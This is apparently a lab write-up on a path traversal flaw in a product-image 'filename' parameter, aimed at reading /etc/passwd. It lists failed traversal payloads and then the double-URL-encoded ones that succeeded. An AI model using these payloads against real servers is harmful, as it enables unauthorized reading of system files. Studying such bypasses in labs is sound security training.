Vulnerable parameter - Product images

Goal: Display the content of the /etc/passwd file

Analysis:
--------

filename=../etc/passwd
-> No such file

filename=../../../etc/passwd
-> No such file

filename=../../etc/passwd
-> No such file

filename=%u002e%u002e%c0%afetc%c0%afpasswd
-> No such file

filename=%2e%2e%2fetc/passwd
-> No such file

filename=%252e%252e%252fetc/passwd
-> No such file

---
filename=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd

%252e%252e%252f ==> ../

or 

filename=..%252f..%252f..%252fetc/passwd
-> This also work
---

Solved